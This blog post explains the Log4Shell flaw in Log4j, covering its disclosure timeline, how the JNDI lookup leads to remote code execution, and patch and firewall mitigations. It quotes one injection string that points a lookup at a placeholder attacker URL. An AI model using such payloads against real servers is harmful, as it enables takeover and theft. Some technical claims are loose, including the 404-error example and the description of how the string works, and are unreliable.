Log4j Vulnerability

Did you know that since December 10, days after industry experts discovered a critical vulnerability known as Log4Shell in servers supporting the game Minecraft, attackers have made millions of exploit attempts of the Log4j? According to one team tracking the impact, the vulnerability is a potential threat to millions more applications and devices across the globe.

In this article, we’ll answer some frequently asked questions about the Log4Shell vulnerability.

The internet vulnerability Log4Shell, which affects millions of machines, is caused by Log4j, an obscure but practically common piece of software. The software is used to track a variety of operations that occur behind the scenes in a variety of computer systems.

So, what exactly is this benign piece of internet infrastructure, how can hackers take advantage of it, and what kind of havoc may it cause?

What exactly is Log4j?

Log4j is a piece of software that allows programmes to retain track of their previous actions. Developers frequently leverage existing programmes like log4j instead of reinventing a logging or record-keeping component each time they create new software. It is available for free on the Internet and is extensively utilised, with a substantial chunk of Internet services using it.

Log4j keeps track of events, such as errors and ordinary system processes, and sends out diagnostic warnings to system administrators and users. The Apache Software Foundation provides open-source software.

When you enter in or click on a poor weblink and get a 404-error message, that’s an example of Log4j at work. There is no such webpage, according to the webserver that hosts the domain of the web link you attempted to access. It also uses Log4j to log the occurrence for the server’s system administrators.

When did the original vulnerability in the Log4j library become known to experts?

The vulnerability was first disclosed to the Apache Foundation (an open-source organisation) on November 24 by security researcher Chen Zhaojun of Alibaba, China’s largest e-commerce giant. They identified the attack on servers hosting the game Minecraft on December 9th. Following more forensic investigation, they revealed that fraudsters had discovered the hole earlier and have been using it since as early as December 1, 2021.

On December 10th, 2021, NIST issued a serious CVE in the National Vulnerability Database, called CVE-2021–44228. The Apache Software Foundation assigned a CVSS severity rating of 10 to this vulnerability.

The flaw allows for remote code execution without authentication. Attackers can exploit it by simply inserting a line of code such as $jndi:ldap:/[attacker URL]. This flaw has been discovered in the products of some of the most well-known technological companies, including AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMWare.

How does it work?

Log4Shell works by exploiting a Log4j feature that allows users to specify custom code for log message formatting. If a separate server keeps a directory linking usernames and real names, this feature allows Log4j to log not just the username associated with each attempt to log in to the server, but also the person’s real name. The Log4j server must communicate with the server that stores the real names in order to accomplish this.

This type of code, however, can be used for more than merely formatting log messages… Third-party servers can upload software code to Log4j that can conduct a variety of tasks on the targeted PC. This allows for criminal operations such as stealing sensitive data, seizing control of the targeted system, and spreading malicious content to other users talking with the affected server.

Log4j is all over the place

The position of Log4Shell in the software ecosystem is one of the primary problems. Because logging is a standard part of most applications, Log4j is widely used. It is used in a wide range of programmes from software development tools to security products. It’s also used in cloud services like Apple iCloud and AWS, as well as a wide range of applications from software development tools to security tools.

As a result, hackers have a wide range of targets to choose from, including ordinary people, service providers, source code developers, and even security experts. While large corporations like Amazon can swiftly fix their web services to prevent hackers from exploiting them, many more enterprises will take longer to do so, and others may not even realise they need to.

How do we mitigate the risks?

  • The vendor has provided a patch, and customers are urged to update their Log4j to version 2.17.0 if possible.
  • Firewall – Using outbound firewall rules on servers to prevent attackers is an effective mitigation method. If the server can perform DNS lookups, and attackers hunt for susceptible log4j2 instances, the DNS lookup will be triggered. Although attackers may readily get around firewalls, having one can help protect you by blocking the outgoing connections of a real attack.

Share This Post:

Facebook
Twitter
LinkedIn
Pinterest
Email
WhatsApp
Steve Byrom
Steve Byrom
What our clients say:
Subscribe to our newsletter

Sign up to receive updates, promotions, and sneak peaks of upcoming products. Plus 20% off your next order.

Promotion nulla vitae elit libero a pharetra augue
Subscribe to our newsletter

Sign up to receive updates, promotions, and sneak peaks of upcoming products. Plus 20% off your next order.

Promotion nulla vitae elit libero a pharetra augue